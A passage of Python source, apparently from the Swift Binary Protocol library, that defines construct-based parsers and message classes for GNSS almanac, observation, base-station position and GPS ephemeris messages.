        almanac uploading. '0' indicates malfunction of n-satellite,
        '1' indicates n-satellite is operational.
      - bit 1: Bn(ln), '0' indicates the satellite is operational and
        suitable for navigation.

  """
  # Wire layout of this struct.
  _parser = construct.Embedded(construct.Struct(
                     'sid' / construct.Struct(GnssSignal._parser),
                     'toa' / construct.Struct(GPSTimeSec._parser),
                     'ura' / construct.Float64l,
                     'fit_interval' / construct.Int32ul,
                     'valid' / construct.Int8ul,
                     'health_bits' / construct.Int8ul,))
  __slots__ = [
               'sid',
               'toa',
               'ura',
               'fit_interval',
               'valid',
               'health_bits',
              ]

  def __init__(self, payload=None, **kwargs):
    # Either parse a raw binary payload, or take each field as a keyword.
    if payload:
      self.from_binary(payload)
    else:
      self.sid = kwargs.pop('sid')
      self.toa = kwargs.pop('toa')
      self.ura = kwargs.pop('ura')
      self.fit_interval = kwargs.pop('fit_interval')
      self.valid = kwargs.pop('valid')
      self.health_bits = kwargs.pop('health_bits')

  def __repr__(self):
    return fmt_repr(self)

  def from_binary(self, d):
    """Parse binary buffer ``d`` into this object's fields."""
    p = AlmanacCommonContent._parser.parse(d)
    for n in self.__class__.__slots__:
      setattr(self, n, getattr(p, n))

  def to_binary(self):
    """Serialize this object's fields to binary.

    Bug fix: the generated code read attributes from the undefined name
    ``obj`` (NameError) and called ``AlmanacCommonContent.build``, which
    this class does not define; serialize from ``self`` via the parser.
    """
    d = dict([(k, getattr(self, k)) for k in self.__slots__])
    return AlmanacCommonContent._parser.build(d)
class AlmanacCommonContentDep(object):
  """AlmanacCommonContentDep.

  Parameters
  ----------
  sid : GnssSignalDep
    GNSS signal identifier
  toa : GPSTimeSec
    Reference time of almanac
  ura : double
    User Range Accuracy
  fit_interval : int
    Curve fit interval
  valid : int
    Status of almanac, 1 = valid, 0 = invalid
  health_bits : int
    Satellite health status for GPS:
      - bits 5-7: NAV data health status. See IS-GPS-200H
        Table 20-VII: NAV Data Health Indications.
      - bits 0-4: Signal health status. See IS-GPS-200H
        Table 20-VIII. Codes for Health of SV Signal Components.
    Satellite health status for GLO (see GLO ICD 5.1 table 5.1):
      - bit 0: C(n), "unhealthy" flag transmitted within non-immediate
        data; indicates overall constellation status at the moment of
        almanac uploading. '0' indicates malfunction of n-satellite,
        '1' indicates n-satellite is operational.
      - bit 1: Bn(ln), '0' indicates the satellite is operational and
        suitable for navigation.

  """
  # Wire layout of this struct (deprecated signal type).
  _parser = construct.Embedded(construct.Struct(
                     'sid' / construct.Struct(GnssSignalDep._parser),
                     'toa' / construct.Struct(GPSTimeSec._parser),
                     'ura' / construct.Float64l,
                     'fit_interval' / construct.Int32ul,
                     'valid' / construct.Int8ul,
                     'health_bits' / construct.Int8ul,))
  __slots__ = [
               'sid',
               'toa',
               'ura',
               'fit_interval',
               'valid',
               'health_bits',
              ]

  def __init__(self, payload=None, **kwargs):
    # Either parse a raw binary payload, or take each field as a keyword.
    if payload:
      self.from_binary(payload)
    else:
      self.sid = kwargs.pop('sid')
      self.toa = kwargs.pop('toa')
      self.ura = kwargs.pop('ura')
      self.fit_interval = kwargs.pop('fit_interval')
      self.valid = kwargs.pop('valid')
      self.health_bits = kwargs.pop('health_bits')

  def __repr__(self):
    return fmt_repr(self)

  def from_binary(self, d):
    """Parse binary buffer ``d`` into this object's fields."""
    p = AlmanacCommonContentDep._parser.parse(d)
    for n in self.__class__.__slots__:
      setattr(self, n, getattr(p, n))

  def to_binary(self):
    """Serialize this object's fields to binary.

    Bug fix: the generated code read attributes from the undefined name
    ``obj`` (NameError) and called ``AlmanacCommonContentDep.build``,
    which this class does not define; serialize from ``self`` via the parser.
    """
    d = dict([(k, getattr(self, k)) for k in self.__slots__])
    return AlmanacCommonContentDep._parser.build(d)
class SvAzEl(object):
  """SvAzEl.

  Satellite azimuth and elevation.

  Parameters
  ----------
  sid : GnssSignal
    GNSS signal identifier
  az : int
    Azimuth angle (range 0..179)
  el : int
    Elevation angle (range -90..90)

  """
  # Wire layout of this struct; el is signed (elevation can be negative).
  _parser = construct.Embedded(construct.Struct(
                     'sid' / construct.Struct(GnssSignal._parser),
                     'az' / construct.Int8ul,
                     'el' / construct.Int8sl,))
  __slots__ = [
               'sid',
               'az',
               'el',
              ]

  def __init__(self, payload=None, **kwargs):
    # Either parse a raw binary payload, or take each field as a keyword.
    if payload:
      self.from_binary(payload)
    else:
      self.sid = kwargs.pop('sid')
      self.az = kwargs.pop('az')
      self.el = kwargs.pop('el')

  def __repr__(self):
    return fmt_repr(self)

  def from_binary(self, d):
    """Parse binary buffer ``d`` into this object's fields."""
    p = SvAzEl._parser.parse(d)
    for n in self.__class__.__slots__:
      setattr(self, n, getattr(p, n))

  def to_binary(self):
    """Serialize this object's fields to binary.

    Bug fix: the generated code read attributes from the undefined name
    ``obj`` (NameError) and called ``SvAzEl.build``, which this class
    does not define; serialize from ``self`` via the parser instead.
    """
    d = dict([(k, getattr(self, k)) for k in self.__slots__])
    return SvAzEl._parser.build(d)
SBP_MSG_OBS = 0x004A
class MsgObs(SBP):
  """SBP class for message MSG_OBS (0x004A).

  You can have MSG_OBS inherit its fields directly
  from an inherited SBP object, or construct it inline using a dict
  of its fields.

  The GPS observations message reports all the raw pseudorange and
  carrier phase observations for the satellites being tracked by
  the device. Carrier phase observation here is represented as a
  40-bit fixed point number with Q32.8 layout (i.e. 32-bits of
  whole cycles and 8-bits of fractional cycles). The observations
  are be interoperable with 3rd party receivers and conform
  with typical RTCMv3 GNSS observations.

  Parameters
  ----------
  sbp : SBP
    SBP parent object to inherit from.
  header : ObservationHeader
    Header of a GPS observation message
  obs : array
    Pseudorange and carrier phase observation for a
    satellite being tracked.
  sender : int
    Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).

  """
  # Payload layout: fixed header followed by as many PackedObsContent
  # records as fit in the payload (GreedyRange).
  _parser = construct.Struct(
                   'header' / construct.Struct(ObservationHeader._parser),
                   construct.GreedyRange('obs' / construct.Struct(PackedObsContent._parser)),)
  __slots__ = [
               'header',
               'obs',
              ]

  def __init__(self, sbp=None, **kwargs):
    # Two construction paths: wrap an already-framed SBP message (copy its
    # framing and decode the payload), or build inline from keyword fields.
    if sbp:
      super( MsgObs,
             self).__init__(sbp.msg_type, sbp.sender, sbp.length,
                            sbp.payload, sbp.crc)
      self.from_binary(sbp.payload)
    else:
      super( MsgObs, self).__init__()
      self.msg_type = SBP_MSG_OBS
      self.sender = kwargs.pop('sender', SENDER_ID)
      self.header = kwargs.pop('header')
      self.obs = kwargs.pop('obs')

  def __repr__(self):
    return fmt_repr(self)

  @staticmethod
  def from_json(s):
    """Given a JSON-encoded string s, build a message object.

    """
    d = json.loads(s)
    return MsgObs.from_json_dict(d)

  @staticmethod
  def from_json_dict(d):
    # Build the SBP framing first, then re-parse field values from d.
    sbp = SBP.from_json_dict(d)
    return MsgObs(sbp, **d)

  def from_binary(self, d):
    """Given a binary payload d, update the appropriate payload fields of
    the message.

    """
    p = MsgObs._parser.parse(d)
    for n in self.__class__.__slots__:
      setattr(self, n, getattr(p, n))

  def to_binary(self):
    """Produce a framed/packed SBP message.

    """
    # containerize/exclude_fields convert this object's slots into a
    # construct-compatible container before building the payload.
    c = containerize(exclude_fields(self))
    self.payload = MsgObs._parser.build(c)
    return self.pack()

  def into_buffer(self, buf, offset):
    """Produce a framed/packed SBP message into the provided buffer and offset.

    """
    self.payload = containerize(exclude_fields(self))
    self.parser = MsgObs._parser
    # stream_payload/pack_into are provided by the SBP base class
    # (see sbp/msg.py); they write the framed message in place.
    self.stream_payload.reset(buf, offset)
    return self.pack_into(buf, offset, self._build_payload)

  def to_json_dict(self):
    # Re-serialize first so the framing fields (length, crc) are current.
    self.to_binary()
    d = super( MsgObs, self).to_json_dict()
    j = walk_json_dict(exclude_fields(self))
    d.update(j)
    return d
SBP_MSG_BASE_POS_LLH = 0x0044
class MsgBasePosLLH(SBP):
  """SBP class for message MSG_BASE_POS_LLH (0x0044).

  You can have MSG_BASE_POS_LLH inherit its fields directly
  from an inherited SBP object, or construct it inline using a dict
  of its fields.

  The base station position message is the position reported by
  the base station itself. It is used for pseudo-absolute RTK
  positioning, and is required to be a high-accuracy surveyed
  location of the base station. Any error here will result in an
  error in the pseudo-absolute position output.

  Parameters
  ----------
  sbp : SBP
    SBP parent object to inherit from.
  lat : double
    Latitude
  lon : double
    Longitude
  height : double
    Height
  sender : int
    Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).

  """
  # Payload layout: three little-endian 64-bit floats.
  _parser = construct.Struct(
                   'lat' / construct.Float64l,
                   'lon' / construct.Float64l,
                   'height' / construct.Float64l,)
  __slots__ = [
               'lat',
               'lon',
               'height',
              ]

  def __init__(self, sbp=None, **kwargs):
    # Two construction paths: wrap an already-framed SBP message (copy its
    # framing and decode the payload), or build inline from keyword fields.
    if sbp:
      super( MsgBasePosLLH,
             self).__init__(sbp.msg_type, sbp.sender, sbp.length,
                            sbp.payload, sbp.crc)
      self.from_binary(sbp.payload)
    else:
      super( MsgBasePosLLH, self).__init__()
      self.msg_type = SBP_MSG_BASE_POS_LLH
      self.sender = kwargs.pop('sender', SENDER_ID)
      self.lat = kwargs.pop('lat')
      self.lon = kwargs.pop('lon')
      self.height = kwargs.pop('height')

  def __repr__(self):
    return fmt_repr(self)

  @staticmethod
  def from_json(s):
    """Given a JSON-encoded string s, build a message object.

    """
    d = json.loads(s)
    return MsgBasePosLLH.from_json_dict(d)

  @staticmethod
  def from_json_dict(d):
    # Build the SBP framing first, then re-parse field values from d.
    sbp = SBP.from_json_dict(d)
    return MsgBasePosLLH(sbp, **d)

  def from_binary(self, d):
    """Given a binary payload d, update the appropriate payload fields of
    the message.

    """
    p = MsgBasePosLLH._parser.parse(d)
    for n in self.__class__.__slots__:
      setattr(self, n, getattr(p, n))

  def to_binary(self):
    """Produce a framed/packed SBP message.

    """
    # containerize/exclude_fields convert this object's slots into a
    # construct-compatible container before building the payload.
    c = containerize(exclude_fields(self))
    self.payload = MsgBasePosLLH._parser.build(c)
    return self.pack()

  def into_buffer(self, buf, offset):
    """Produce a framed/packed SBP message into the provided buffer and offset.

    """
    self.payload = containerize(exclude_fields(self))
    self.parser = MsgBasePosLLH._parser
    # stream_payload/pack_into are provided by the SBP base class
    # (see sbp/msg.py); they write the framed message in place.
    self.stream_payload.reset(buf, offset)
    return self.pack_into(buf, offset, self._build_payload)

  def to_json_dict(self):
    # Re-serialize first so the framing fields (length, crc) are current.
    self.to_binary()
    d = super( MsgBasePosLLH, self).to_json_dict()
    j = walk_json_dict(exclude_fields(self))
    d.update(j)
    return d
SBP_MSG_BASE_POS_ECEF = 0x0048
class MsgBasePosECEF(SBP):
  """SBP class for message MSG_BASE_POS_ECEF (0x0048).

  Carries the position reported by the base station itself, in absolute
  Earth Centered Earth Fixed coordinates.  It is used for pseudo-absolute
  RTK positioning and must be a high-accuracy surveyed location: any
  error here propagates directly into the pseudo-absolute position
  output.

  A MsgBasePosECEF can either wrap an already-parsed SBP frame (pass it
  as ``sbp``) or be constructed inline from keyword fields.

  Parameters
  ----------
  sbp : SBP
    SBP parent object to inherit from.
  x : double
    ECEF X coodinate
  y : double
    ECEF Y coordinate
  z : double
    ECEF Z coordinate
  sender : int
    Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
  """
  _parser = construct.Struct(
    'x' / construct.Float64l,
    'y' / construct.Float64l,
    'z' / construct.Float64l,)
  __slots__ = [
    'x',
    'y',
    'z',
  ]

  def __init__(self, sbp=None, **kwargs):
    if sbp:
      # Wrap an existing frame: copy the framing fields, then decode the
      # payload into this message's slots.
      super(MsgBasePosECEF, self).__init__(sbp.msg_type, sbp.sender,
                                           sbp.length, sbp.payload, sbp.crc)
      self.from_binary(sbp.payload)
    else:
      # Inline construction from keyword fields.
      super(MsgBasePosECEF, self).__init__()
      self.msg_type = SBP_MSG_BASE_POS_ECEF
      self.sender = kwargs.pop('sender', SENDER_ID)
      self.x = kwargs.pop('x')
      self.y = kwargs.pop('y')
      self.z = kwargs.pop('z')

  def __repr__(self):
    return fmt_repr(self)

  @staticmethod
  def from_json(s):
    """Given a JSON-encoded string s, build a message object.
    """
    return MsgBasePosECEF.from_json_dict(json.loads(s))

  @staticmethod
  def from_json_dict(d):
    frame = SBP.from_json_dict(d)
    return MsgBasePosECEF(frame, **d)

  def from_binary(self, d):
    """Given a binary payload d, update the appropriate payload fields of
    the message.
    """
    decoded = MsgBasePosECEF._parser.parse(d)
    for field in self.__class__.__slots__:
      setattr(self, field, getattr(decoded, field))

  def to_binary(self):
    """Produce a framed/packed SBP message.
    """
    container = containerize(exclude_fields(self))
    self.payload = MsgBasePosECEF._parser.build(container)
    return self.pack()

  def into_buffer(self, buf, offset):
    """Produce a framed/packed SBP message into the provided buffer and offset.
    """
    self.payload = containerize(exclude_fields(self))
    self.parser = MsgBasePosECEF._parser
    self.stream_payload.reset(buf, offset)
    return self.pack_into(buf, offset, self._build_payload)

  def to_json_dict(self):
    # Refresh framing fields, then overlay this message's own fields.
    self.to_binary()
    d = super(MsgBasePosECEF, self).to_json_dict()
    d.update(walk_json_dict(exclude_fields(self)))
    return d
SBP_MSG_EPHEMERIS_GPS_DEP_E = 0x0081
class MsgEphemerisGPSDepE(SBP):
  """SBP class for message MSG_EPHEMERIS_GPS_DEP_E (0x0081).

  You can have MSG_EPHEMERIS_GPS_DEP_E inherit its fields directly
  from an inherited SBP object, or construct it inline using a dict
  of its fields.

  The ephemeris message returns a set of satellite orbit
  parameters that is used to calculate GPS satellite position,
  velocity, and clock offset. Please see the Navstar GPS
  Space Segment/Navigation user interfaces (ICD-GPS-200, Table
  20-III) for more details.

  Parameters
  ----------
  sbp : SBP
    SBP parent object to inherit from.
  common : EphemerisCommonContentDepA
    Values common for all ephemeris types
  tgd : double
    Group delay differential between L1 and L2
  c_rs : double
    Amplitude of the sine harmonic correction term to the orbit radius
  c_rc : double
    Amplitude of the cosine harmonic correction term to the orbit radius
  c_uc : double
    Amplitude of the cosine harmonic correction term to the argument of latitude
  c_us : double
    Amplitude of the sine harmonic correction term to the argument of latitude
  c_ic : double
    Amplitude of the cosine harmonic correction term to the angle of inclination
  c_is : double
    Amplitude of the sine harmonic correction term to the angle of inclination
  dn : double
    Mean motion difference
  m0 : double
    Mean anomaly at reference time
  ecc : double
    Eccentricity of satellite orbit
  sqrta : double
    Square root of the semi-major axis of orbit
  omega0 : double
    Longitude of ascending node of orbit plane at weekly epoch
  omegadot : double
    Rate of right ascension
  w : double
    Argument of perigee
  inc : double
    Inclination
  inc_dot : double
    Inclination first derivative
  af0 : double
    Polynomial clock correction coefficient (clock bias)
  af1 : double
    Polynomial clock correction coefficient (clock drift)
  af2 : double
    Polynomial clock correction coefficient (rate of clock drift)
  toc : GPSTimeDep
    Clock reference
  iode : int
    Issue of ephemeris data
  iodc : int
    Issue of clock data
  sender : int
    Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
  """
  # Wire-format layout of the payload (little-endian fields); declaration
  # order defines byte order on the wire and must stay in sync with __slots__.
  _parser = construct.Struct(
    'common' / construct.Struct(EphemerisCommonContentDepA._parser),
    'tgd' / construct.Float64l,
    'c_rs' / construct.Float64l,
    'c_rc' / construct.Float64l,
    'c_uc' / construct.Float64l,
    'c_us' / construct.Float64l,
    'c_ic' / construct.Float64l,
    'c_is' / construct.Float64l,
    'dn' / construct.Float64l,
    'm0' / construct.Float64l,
    'ecc' / construct.Float64l,
    'sqrta' / construct.Float64l,
    'omega0' / construct.Float64l,
    'omegadot' / construct.Float64l,
    'w' / construct.Float64l,
    'inc' / construct.Float64l,
    'inc_dot' / construct.Float64l,
    'af0' / construct.Float64l,
    'af1' / construct.Float64l,
    'af2' / construct.Float64l,
    'toc' / construct.Struct(GPSTimeDep._parser),
    'iode' / construct.Int8ul,
    'iodc' / construct.Int16ul,)
  __slots__ = [
    'common',
    'tgd',
    'c_rs',
    'c_rc',
    'c_uc',
    'c_us',
    'c_ic',
    'c_is',
    'dn',
    'm0',
    'ecc',
    'sqrta',
    'omega0',
    'omegadot',
    'w',
    'inc',
    'inc_dot',
    'af0',
    'af1',
    'af2',
    'toc',
    'iode',
    'iodc',
  ]

  def __init__(self, sbp=None, **kwargs):
    if sbp:
      # Built from an existing SBP frame: copy framing fields, then decode
      # the payload into this message's slots.
      super( MsgEphemerisGPSDepE,
             self).__init__(sbp.msg_type, sbp.sender, sbp.length,
                            sbp.payload, sbp.crc)
      self.from_binary(sbp.payload)
    else:
      # Built inline from keyword arguments.
      super( MsgEphemerisGPSDepE, self).__init__()
      self.msg_type = SBP_MSG_EPHEMERIS_GPS_DEP_E
      self.sender = kwargs.pop('sender', SENDER_ID)
      self.common = kwargs.pop('common')
      self.tgd = kwargs.pop('tgd')
      self.c_rs = kwargs.pop('c_rs')
      self.c_rc = kwargs.pop('c_rc')
      self.c_uc = kwargs.pop('c_uc')
      self.c_us = kwargs.pop('c_us')
      self.c_ic = kwargs.pop('c_ic')
      self.c_is = kwargs.pop('c_is')
      self.dn = kwargs.pop('dn')
      self.m0 = kwargs.pop('m0')
      self.ecc = kwargs.pop('ecc')
      self.sqrta = kwargs.pop('sqrta')
      self.omega0 = kwargs.pop('omega0')
      self.omegadot = kwargs.pop('omegadot')
      self.w = kwargs.pop('w')
      self.inc = kwargs.pop('inc')
      self.inc_dot = kwargs.pop('inc_dot')
      self.af0 = kwargs.pop('af0')
      self.af1 = kwargs.pop('af1')
      self.af2 = kwargs.pop('af2')
      self.toc = kwargs.pop('toc')
      self.iode = kwargs.pop('iode')
      self.iodc = kwargs.pop('iodc')

  def __repr__(self):
    return fmt_repr(self)

  @staticmethod
  def from_json(s):
    """Given a JSON-encoded string s, build a message object.
    """
    d = json.loads(s)
    return MsgEphemerisGPSDepE.from_json_dict(d)

  @staticmethod
  def from_json_dict(d):
    sbp = SBP.from_json_dict(d)
    return MsgEphemerisGPSDepE(sbp, **d)

  def from_binary(self, d):
    """Given a binary payload d, update the appropriate payload fields of
    the message.
    """
    p = MsgEphemerisGPSDepE._parser.parse(d)
    for n in self.__class__.__slots__:
      setattr(self, n, getattr(p, n))

  def to_binary(self):
    """Produce a framed/packed SBP message.
    """
    c = containerize(exclude_fields(self))
    self.payload = MsgEphemerisGPSDepE._parser.build(c)
    return self.pack()

  def into_buffer(self, buf, offset):
    """Produce a framed/packed SBP message into the provided buffer and offset.
    """
    # NOTE(review): payload is left as a container here; presumably
    # _build_payload serializes it through self.parser inside pack_into.
    self.payload = containerize(exclude_fields(self))
    self.parser = MsgEphemerisGPSDepE._parser
    self.stream_payload.reset(buf, offset)
    return self.pack_into(buf, offset, self._build_payload)

  def to_json_dict(self):
    # Refresh framing fields, then overlay this message's own fields.
    self.to_binary()
    d = super( MsgEphemerisGPSDepE, self).to_json_dict()
    j = walk_json_dict(exclude_fields(self))
    d.update(j)
    return d
SBP_MSG_EPHEMERIS_GPS_DEP_F = 0x0086
class MsgEphemerisGPSDepF(SBP):
  """SBP class for message MSG_EPHEMERIS_GPS_DEP_F (0x0086).

  You can have MSG_EPHEMERIS_GPS_DEP_F inherit its fields directly
  from an inherited SBP object, or construct it inline using a dict
  of its fields.

  This observation message has been deprecated in favor of
  ephemeris message using floats for size reduction.

  Parameters
  ----------
  sbp : SBP
    SBP parent object to inherit from.
  common : EphemerisCommonContentDepB
    Values common for all ephemeris types
  tgd : double
    Group delay differential between L1 and L2
  c_rs : double
    Amplitude of the sine harmonic correction term to the orbit radius
  c_rc : double
    Amplitude of the cosine harmonic correction term to the orbit radius
  c_uc : double
    Amplitude of the cosine harmonic correction term to the argument of latitude
  c_us : double
    Amplitude of the sine harmonic correction term to the argument of latitude
  c_ic : double
    Amplitude of the cosine harmonic correction term to the angle of inclination
  c_is : double
    Amplitude of the sine harmonic correction term to the angle of inclination
  dn : double
    Mean motion difference
  m0 : double
    Mean anomaly at reference time
  ecc : double
    Eccentricity of satellite orbit
  sqrta : double
    Square root of the semi-major axis of orbit
  omega0 : double
    Longitude of ascending node of orbit plane at weekly epoch
  omegadot : double
    Rate of right ascension
  w : double
    Argument of perigee
  inc : double
    Inclination
  inc_dot : double
    Inclination first derivative
  af0 : double
    Polynomial clock correction coefficient (clock bias)
  af1 : double
    Polynomial clock correction coefficient (clock drift)
  af2 : double
    Polynomial clock correction coefficient (rate of clock drift)
  toc : GPSTimeSec
    Clock reference
  iode : int
    Issue of ephemeris data
  iodc : int
    Issue of clock data
  sender : int
    Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
  """
  # Wire-format layout of the payload (little-endian fields); declaration
  # order defines byte order on the wire and must stay in sync with __slots__.
  _parser = construct.Struct(
    'common' / construct.Struct(EphemerisCommonContentDepB._parser),
    'tgd' / construct.Float64l,
    'c_rs' / construct.Float64l,
    'c_rc' / construct.Float64l,
    'c_uc' / construct.Float64l,
    'c_us' / construct.Float64l,
    'c_ic' / construct.Float64l,
    'c_is' / construct.Float64l,
    'dn' / construct.Float64l,
    'm0' / construct.Float64l,
    'ecc' / construct.Float64l,
    'sqrta' / construct.Float64l,
    'omega0' / construct.Float64l,
    'omegadot' / construct.Float64l,
    'w' / construct.Float64l,
    'inc' / construct.Float64l,
    'inc_dot' / construct.Float64l,
    'af0' / construct.Float64l,
    'af1' / construct.Float64l,
    'af2' / construct.Float64l,
    'toc' / construct.Struct(GPSTimeSec._parser),
    'iode' / construct.Int8ul,
    'iodc' / construct.Int16ul,)
  __slots__ = [
    'common',
    'tgd',
    'c_rs',
    'c_rc',
    'c_uc',
    'c_us',
    'c_ic',
    'c_is',
    'dn',
    'm0',
    'ecc',
    'sqrta',
    'omega0',
    'omegadot',
    'w',
    'inc',
    'inc_dot',
    'af0',
    'af1',
    'af2',
    'toc',
    'iode',
    'iodc',
  ]

  def __init__(self, sbp=None, **kwargs):
    if sbp:
      # Built from an existing SBP frame: copy framing fields, then decode
      # the payload into this message's slots.
      super( MsgEphemerisGPSDepF,
             self).__init__(sbp.msg_type, sbp.sender, sbp.length,
                            sbp.payload, sbp.crc)
      self.from_binary(sbp.payload)
    else:
      # Built inline from keyword arguments.
      super( MsgEphemerisGPSDepF, self).__init__()
      self.msg_type = SBP_MSG_EPHEMERIS_GPS_DEP_F
      self.sender = kwargs.pop('sender', SENDER_ID)
      self.common = kwargs.pop('common')
      self.tgd = kwargs.pop('tgd')
      self.c_rs = kwargs.pop('c_rs')
      self.c_rc = kwargs.pop('c_rc')
      self.c_uc = kwargs.pop('c_uc')
      self.c_us = kwargs.pop('c_us')
      self.c_ic = kwargs.pop('c_ic')
      self.c_is = kwargs.pop('c_is')
      self.dn = kwargs.pop('dn')
      self.m0 = kwargs.pop('m0')
      self.ecc = kwargs.pop('ecc')
      self.sqrta = kwargs.pop('sqrta')
      self.omega0 = kwargs.pop('omega0')
      self.omegadot = kwargs.pop('omegadot')
      self.w = kwargs.pop('w')
      self.inc = kwargs.pop('inc')
      self.inc_dot = kwargs.pop('inc_dot')
      self.af0 = kwargs.pop('af0')
      self.af1 = kwargs.pop('af1')
      self.af2 = kwargs.pop('af2')
      self.toc = kwargs.pop('toc')
      self.iode = kwargs.pop('iode')
      self.iodc = kwargs.pop('iodc')

  def __repr__(self):
    return fmt_repr(self)

  @staticmethod
  def from_json(s):
    """Given a JSON-encoded string s, build a message object.
    """
    d = json.loads(s)
    return MsgEphemerisGPSDepF.from_json_dict(d)

  @staticmethod
  def from_json_dict(d):
    sbp = SBP.from_json_dict(d)
    return MsgEphemerisGPSDepF(sbp, **d)

  def from_binary(self, d):
    """Given a binary payload d, update the appropriate payload fields of
    the message.
    """
    p = MsgEphemerisGPSDepF._parser.parse(d)
    for n in self.__class__.__slots__:
      setattr(self, n, getattr(p, n))

  def to_binary(self):
    """Produce a framed/packed SBP message.
    """
    c = containerize(exclude_fields(self))
    self.payload = MsgEphemerisGPSDepF._parser.build(c)
    return self.pack()

  def into_buffer(self, buf, offset):
    """Produce a framed/packed SBP message into the provided buffer and offset.
    """
    # NOTE(review): payload is left as a container here; presumably
    # _build_payload serializes it through self.parser inside pack_into.
    self.payload = containerize(exclude_fields(self))
    self.parser = MsgEphemerisGPSDepF._parser
    self.stream_payload.reset(buf, offset)
    return self.pack_into(buf, offset, self._build_payload)

  def to_json_dict(self):
    # Refresh framing fields, then overlay this message's own fields.
    self.to_binary()
    d = super( MsgEphemerisGPSDepF, self).to_json_dict()
    j = walk_json_dict(exclude_fields(self))
    d.update(j)
    return d
SBP_MSG_EPHEMERIS_GPS = 0x008A
class MsgEphemerisGPS(SBP):
  """SBP class for message MSG_EPHEMERIS_GPS (0x008A).

  You can have MSG_EPHEMERIS_GPS inherit its fields directly
  from an inherited SBP object, or construct it inline using a dict
  of its fields.

  The ephemeris message returns a set of satellite orbit
  parameters that is used to calculate GPS satellite position,
  velocity, and clock offset. Please see the Navstar GPS
  Space Segment/Navigation user interfaces (ICD-GPS-200, Table
  20-III) for more details.

  Parameters
  ----------
  sbp : SBP
    SBP parent object to inherit from.
  common : EphemerisCommonContent
    Values common for all ephemeris types
  tgd : float
    Group delay differential between L1 and L2
  c_rs : float
    Amplitude of the sine harmonic correction term to the orbit radius
  c_rc : float
    Amplitude of the cosine harmonic correction term to the orbit radius
  c_uc : float
    Amplitude of the cosine harmonic correction term to the argument of latitude
  c_us : float
    Amplitude of the sine harmonic correction term to the argument of latitude
  c_ic : float
    Amplitude of the cosine harmonic correction term to the angle of inclination
  c_is : float
    Amplitude of the sine harmonic correction term to the angle of inclination
  dn : double
    Mean motion difference
  m0 : double
    Mean anomaly at reference time
  ecc : double
    Eccentricity of satellite orbit
  sqrta : double
    Square root of the semi-major axis of orbit
  omega0 : double
    Longitude of ascending node of orbit plane at weekly epoch
  omegadot : double
    Rate of right ascension
  w : double
    Argument of perigee
  inc : double
    Inclination
  inc_dot : double
    Inclination first derivative
  af0 : float
    Polynomial clock correction coefficient (clock bias)
  af1 : float
    Polynomial clock correction coefficient (clock drift)
  af2 : float
    Polynomial clock correction coefficient (rate of clock drift)
  toc : GPSTimeSec
    Clock reference
  iode : int
    Issue of ephemeris data
  iodc : int
    Issue of clock data
  sender : int
    Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
  """
  # Wire-format layout of the payload (little-endian fields).  Note the
  # harmonic corrections and clock coefficients are single-precision here,
  # unlike the deprecated DEP_E/DEP_F variants.  Declaration order defines
  # byte order on the wire and must stay in sync with __slots__.
  _parser = construct.Struct(
    'common' / construct.Struct(EphemerisCommonContent._parser),
    'tgd' / construct.Float32l,
    'c_rs' / construct.Float32l,
    'c_rc' / construct.Float32l,
    'c_uc' / construct.Float32l,
    'c_us' / construct.Float32l,
    'c_ic' / construct.Float32l,
    'c_is' / construct.Float32l,
    'dn' / construct.Float64l,
    'm0' / construct.Float64l,
    'ecc' / construct.Float64l,
    'sqrta' / construct.Float64l,
    'omega0' / construct.Float64l,
    'omegadot' / construct.Float64l,
    'w' / construct.Float64l,
    'inc' / construct.Float64l,
    'inc_dot' / construct.Float64l,
    'af0' / construct.Float32l,
    'af1' / construct.Float32l,
    'af2' / construct.Float32l,
    'toc' / construct.Struct(GPSTimeSec._parser),
    'iode' / construct.Int8ul,
    'iodc' / construct.Int16ul,)
  __slots__ = [
    'common',
    'tgd',
    'c_rs',
    'c_rc',
    'c_uc',
    'c_us',
    'c_ic',
    'c_is',
    'dn',
    'm0',
    'ecc',
    'sqrta',
    'omega0',
    'omegadot',
    'w',
    'inc',
    'inc_dot',
    'af0',
    'af1',
    'af2',
    'toc',
    'iode',
    'iodc',
  ]

  def __init__(self, sbp=None, **kwargs):
    if sbp:
      # Built from an existing SBP frame: copy framing fields, then decode
      # the payload into this message's slots.
      super( MsgEphemerisGPS,
             self).__init__(sbp.msg_type, sbp.sender, sbp.length,
                            sbp.payload, sbp.crc)
      self.from_binary(sbp.payload)
    else:
      # Built inline from keyword arguments.
      super( MsgEphemerisGPS, self).__init__()
      self.msg_type = SBP_MSG_EPHEMERIS_GPS
      self.sender = kwargs.pop('sender', SENDER_ID)
      self.common = kwargs.pop('common')
      self.tgd = kwargs.pop('tgd')
      self.c_rs = kwargs.pop('c_rs')
      self.c_rc = kwargs.pop('c_rc')
      self.c_uc = kwargs.pop('c_uc')
      self.c_us = kwargs.pop('c_us')
      self.c_ic = kwargs.pop('c_ic')
      self.c_is = kwargs.pop('c_is')
      self.dn = kwargs.pop('dn')
      self.m0 = kwargs.pop('m0')
      self.ecc = kwargs.pop('ecc')
      self.sqrta = kwargs.pop('sqrta')
      self.omega0 = kwargs.pop('omega0')
      self.omegadot = kwargs.pop('omegadot')
      self.w = kwargs.pop('w')
      self.inc = kwargs.pop('inc')
      self.inc_dot = kwargs.pop('inc_dot')
      self.af0 = kwargs.pop('af0')
      self.af1 = kwargs.pop('af1')
      self.af2 = kwargs.pop('af2')
      self.toc = kwargs.pop('toc')
      self.iode = kwargs.pop('iode')
      self.iodc = kwargs.pop('iodc')

  def __repr__(self):
    return fmt_repr(self)

  @staticmethod
  def from_json(s):
    """Given a JSON-encoded string s, build a message object.
    """
    d = json.loads(s)
    return MsgEphemerisGPS.from_json_dict(d)

  @staticmethod
  def from_json_dict(d):
    sbp = SBP.from_json_dict(d)
    return MsgEphemerisGPS(sbp, **d)

  def from_binary(self, d):
    """Given a binary payload d, update the appropriate payload fields of
    the message.
    """
    p = MsgEphemerisGPS._parser.parse(d)
    for n in self.__class__.__slots__:
      setattr(self, n, getattr(p, n))

  def to_binary(self):
    """Produce a framed/packed SBP message.
    """
    c = containerize(exclude_fields(self))
    self.payload = MsgEphemerisGPS._parser.build(c)
    return self.pack()

  def into_buffer(self, buf, offset):
    """Produce a framed/packed SBP message into the provided buffer and offset.
    """
    # NOTE(review): payload is left as a container here; presumably
